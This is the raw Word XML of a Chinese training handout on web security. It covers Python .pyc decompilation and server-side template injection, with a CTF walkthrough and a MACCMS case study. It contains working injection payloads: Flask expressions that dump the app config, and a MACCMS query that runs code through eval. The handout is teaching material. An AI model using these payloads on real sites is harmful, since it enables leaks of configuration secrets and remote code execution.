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FF0000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>WEB攻防-Python考点&amp;CTF与CMS-SSTI模版注入&amp;PYC反编译</w:t>
      </w:r>
    </w:p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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4119768" cy="896366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768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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5760720" cy="2217333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commentRangeStart w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5760720" cy="6571313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#知识点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1、PYC文件反编译</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2、Python-Web-SSTI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3、SSTI模版注入利用分析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演示案例：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PY反编译-PYC编译文件反编译源码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SSTI入门-原理&amp;分类&amp;检测&amp;分析&amp;利用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SSTI考点-CTF靶场-[WesternCTF]shrine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SSTI考点-CMS源码-MACCMS_V8.X执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PY反编译-PYC编译文件反编译源码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">pyc文件是py文件编译后生成的字节码文件(byte code)，pyc文件经过python解释器最终会生成机器码运行。因此pyc文件是可以跨平台部署的，类似Java的.class文件，一般py文件改变后，都会重新生成pyc文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">真题附件：http://pan.baidu.com/s/1jGpB8DS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">反编译平台：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">https://tool.lu/pyc/ </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">http://tools.bugscaner.com/decompyle/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">反编译工具：https://github.com/wibiti/uncompyle2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SSTI入门-原理&amp;分类&amp;检测&amp;分析&amp;利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">什么是SSTI？有什么漏洞危害？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">漏洞成因就是服务端接收了用户的恶意输入以后，未经任何处理就将其作为 Web 应用模板内容的一部分，模板引擎在进行目标编译渲染的过程中，执行了用户插入的可以破坏模板的语句，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2、如何判断检测SSTI漏洞的存在？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-输入的数据会被浏览器利用当前脚本语言调用解析执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3、SSTI会产生在那些语言开发应用？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-见上图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">4、SSTI安全问题在生产环境那里产生？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-存在模版引用的地方，如4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">04</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">错误页</w:t>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r>
        <w:commentReference w:id="1"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">面展示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">数据接收引用的地方，如模版解析获取参数数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SSTI考点-CTF靶场-[WesternCTF]shrine</w:t>
      </w:r>
      <w:commentRangeStart w:id="2"/>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:commentRangeEnd w:id="2"/>
      <w:r>
        <w:commentReference w:id="2"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1、源码分析SSTI考点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2、测试判断SSTI存在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3、分析代码过滤和FLAG存储</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">4、利用Flask两个函数利用获取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">https://blog.csdn.net/houyanhua1/article/details/85470175</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">url_for()函数是用于构建操作指定函数的URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">get_flashed_messages()函数是获取传递过来的数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">/shrine/{{url_for.__globals__}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">/shrine/{{url_for.__globals__['current_app'].config}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">/shrine/{{get_flashed_messages.__globals__}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">/shrine/{{get_flashed_messages.__globals__['current_app'].config}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SSTI考点-CMS源码-MACCMS_V8.X执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Payload:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">index.php?m=vod-search&amp;wd={if-dddd:phpinfo()}{endif-dddd}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、根据wd传递的代码找指向文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">index-&gt;vod-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pl-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">x-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">val</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">构造Payload带入ifex并绕过后执行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涉及资源：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333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
      <w:hyperlink r:id="rId14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补充：涉及录像课件资源软件包资料等下载地址</w:t>
        </w:r>
      </w:hyperlink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comment w:initials="t" w:author="明" w:date="2022-05-15T03:27:42Z" w:id="0">
    <w:p w14:paraId="333b7803" w14:textId="3213e9f8">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>大哥你在卷什么 @Sole Mate</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="窗外哈希值" w:date="2022-03-14T16:09:46Z" w:id="1">
    <w:p w14:paraId="3292006c" w14:textId="3b140a60">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>查看css是否传参引出404报错模块。</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="窗外哈希值" w:date="2022-03-14T16:31:21Z" w:id="2">
    <w:p w14:paraId="33980bf7" w14:textId="3f3d2133">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>python SSTI沙盒逃逸：https://www.anquanke.com/post/id/188172</w:t>
      </w:r>
    </w:p>
  </w:comment>
</w:comments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15:commentEx w15:paraId="333b7803" w15:done="0"/>
  <w15:commentEx w15:paraId="3292006c" w15:done="0"/>
  <w15:commentEx w15:paraId="33980b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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Mode="External" Target="https://docs.qq.com/doc/DQ3Z6RkNpaUtMcEFr" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId1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